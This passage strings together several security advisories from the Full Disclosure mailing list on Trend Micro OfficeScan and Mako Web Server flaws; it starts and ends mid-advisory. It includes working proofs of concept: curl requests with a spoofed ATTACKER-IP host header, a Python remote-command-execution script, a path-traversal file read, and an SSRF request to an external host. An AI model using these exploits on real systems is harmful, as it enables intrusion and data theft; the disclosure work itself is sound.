CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity you want to talk to... References: ===https://success.trendmicro.com/solution/1118372 Vulnerable code snippet... curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false); curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true); curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true); curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0); <=== HERE curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0); < THERE Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: May 31, 2017 Vendor releases fixes / advisory : September 27, 2017 September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* Host Header Injection CVE-2017-14087
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt [+] ISR: ApparitionSec Vendor: ==www.trendmicro.com Product: OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Host Header Injection CVE Reference: == CVE-2017-14087 Security Issue: Host header injection issue as "db_controller.php" relies on $_SERVER['HTTP_HOST'] which can be spoofed by client, instead of $_SERVER['SERVER_NAME']. In environments where caching is in place by making HTTP GET request with a poisoned HOST header webpages can potentially render arbitrary links that point to a malicious website. Exploit/POC: = c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP" Network Access: === Remote Severity: = Medium Disclosure Timeline: == Vendor Notification: June 2, 2017 Vendor releases fixes / advisory : September 27, 2017 September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized NT Domain / PHP Information Disclosures CVE-2017-14085
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt
[+] ISR: ApparitionSec
Vendor:
==www.trendmicro.com
Product:
===
OfficeScan
v11.0 and XG (12.0)*
Vulnerability Type:
===
Unauthorized NT Domain Disclosure
Unauthorized PHP Information Disclosure
OfficeScan protects enterprise networks from malware, network viruses,
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent
program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and
reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated
security policies and deploy updates to every agent.
CVE Reference:
==
CVE-2017-14085
Security Issue(s):
( NT Domain Disclosure )
Remote unauthenticated attackers who reach the TrendMicro OfficeScan
XG application can query the networks NT domains.
NT enumeration is leaked by the web interface when it should not do
so. Usually, you use NET commands so while this NT enumeration
is not high in severity, it should not return this information and
especially to unauthorized users as it can aid in launching
further attacks.
( PHP Information Disclosure )
Remote unauthenticated attackers that can connect to TrendMicro
OfficeScan XG application can query the PHP version and modules.
In 'analyzeWF.php" we see get_loaded_extensions() and phpversion()
calls, but session or authentication check is made.
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version:
'.phpversion());
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions:
'.implode(', ',get_loaded_extensions()));
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion);
etc...
References:
===https://success.trendmicro.com/solution/1118372
Exploit/POC (NT Domain Disclosure):
=
[root@localhost /]# curl -v -k
https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe
* About to connect() to VICTIM-IP port 4343
* Trying VICTIM-IP... connected
< HTTP/1.1 200 OK
< Pragma: no-cache
< Content-Type: text/plain;charset=utf-8
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Thu, 01 Jun 2017 15:27:27 GMT
< Connection: close
< Content-Length: 510
{
"ERROR" : {
"ERROR_CODE" : 0
},
"RESPONSE" : {
"NODES" : [
{
"NAME" : "Avaya"
},
{
"NAME" : "Km-netprinters"
},
{
"NAME" : "Mshome"
},
{
"NAME" : "Printserver"
},
{
"NAME" : "MyDomain"
},
{
"NAME" : "Workgroup"
},
{
"NAME" : "Xpemb"
}
]
}
}
Exploit / POC (PHP Information Disclosure):
c:\> curl -k
https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php
HTTP/1.1 200 OK
[INI_UPDATE_SECTION]
>>>> Start Anaylze WGF : 2017-06-02 15:58:26
[INFO] Current PHP version: 7.0.6
[INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter,
hash, iconv, json, mcrypt, SPL, pcre, Reflection, session, standard,
mysqlnd, tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML,
xml, wddx, xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring,
Phar, pdo_sqlite, soap, com_dotnet
[INFO] WGF version : 3.8
[INFO] WGF current wp in /path/to/widgetPool/config.php : wp2
[INFO] WGF is /path/to/widgets_new exists : true
[ERROR] C:\Windows\TEMP check read/write permissions : failed
To solved this problem please reference document here.
etc...
Network Access:
===
Remote
Severity:
=
Medium
Disclosure Timeline:
=
Vendor Notification: June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herei
[FD] Mako Web Server v2.5 Multiple Unauthenticated Vulnerabilities
[+] SSD Beyond Security:
https://blogs.securiteam.com/index.php/archives/3391
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt
[+] ISR: ApparitionSec
Vulnerabilities Summary
The following advisory describe three (3) vulnerabilities found in Mako
Server’s tutorial page.
The vulnerabilities found are:
Unauthenticated Arbitrary File Write vulnerability that leads to Remote
Command Execution
Unauthenticated File Disclosure
Unauthenticated Server Side Request Forgery
As these tutorial may be used as the basis for production code, it is
important for users to be aware of these issues.
“As a compact application and web server, the Mako Server helps developers
rapidly design secure IoT and web applications. The Mako Server provides
an application server environment from which developers can design and
implement complete, custom solutions. The Mako Web Server is ideal for
embedded Linux systems.”
Credit
An independent security researcher, John Page AKA hyp3rlinx, has reported
this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
RealTimeLogic was informed of the vulnerability on Aug 13, but while
acknowledging the receipt of the vulnerability information, refused to
respond to the
technical claims, to give a fix timeline or coordinate an advisory, saying:
“I just sent a formal notification for the commercial license requirement
and also we need to put a maintenance contract in place.
Internally I need to set-up a cost allocation account for billing against
these support inquiries.”
At this time it’s unclear whether these vulnerabilities are going to be
fixed and further attempts to get a status clarification failed.
Vulnerabilities details
Unauthenticated Arbitrary File Write vulnerability that leads to Remote
Command Execution:
Mako web-server tutorial does not sufficiently sanitizing the HTTP PUT
requests, when an attacker send HTTP PUT request to ‘save.lsp‘ web page,
the input passed
to a function responsible for accessing the filesystem.
The attacker input will be saved on the victims machine and can be execute
by sending HTTP GET request to ‘manage.lsp‘
HTTP PUT 'http://VICTIM-IP/examples/save.lsp?ex=2.1'
HTTP GET 'http://VICTIM-IP/examples/manage.lsp?execute=true=2.1=lua
'
Proof of Concept
import urllib2,time
#MakoServer v2.5 Remote Command Execution 0day
#Credits: John Page AKA hyp3rlinx
#=
print 'MakoServer v2.5 Remote Command Execution'
CMD="os.execute('c:/Windows/system32/calc.exe')"
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD)
request.add_header('Content-Type', 'text/plain;charset=UTF-8')
request.add_header('X-Requested-With', 'XMLHttpRequest')
request.add_header('Referer', 'http://localhost/Lua-Types.lsp')
request.get_method = lambda: 'PUT'
opener.open(request)
time.sleep(1)
urllib2.urlopen('http://IP/examples/manage.lsp?execute=true=2.1=lua
')
Unauthenticated File Disclosure
Mako web-server tutorial is not sufficiently sanitizing GET requests, when
an attacker send GET request to the URI IP/fs/../.., the input passed
without modification and the response with the file content is returned.
Proof of Concept
The following GET request will response with the C/Windows/system.ini
content:
curl -v http://VICTIM-IP/fs/C/Windows/system.ini
* About to connect() to VICTIM-IP port 80
* Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 80
> GET /fs/C/Windows/system.ini HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 07 Aug 2017 22:21:27 GMT
< Server: MakoServer.net
< Content-Type: application/octet-stream
< Accept-Ranges: bytes
< Etag: 58b4be20
< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT
< Content-Length: 219
< Keep-Alive: Keep-Alive
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Server Side Request Forgery
Mako web-server tutorial is not sufficiently sanitizing incoming POST
requests, when an attacker sends an POST request to the
‘rtl/appmgr/new-application.lsp‘
URI, the input will be executed and the server will connect to the
attacker’s machine.
Proof of Concept
Start Wireshark to see successful connections made from Mako Web Server
victim machine.
Initiate requests from another machine using CURL:
curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net
-d path=http://EXTERNAL-IP
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
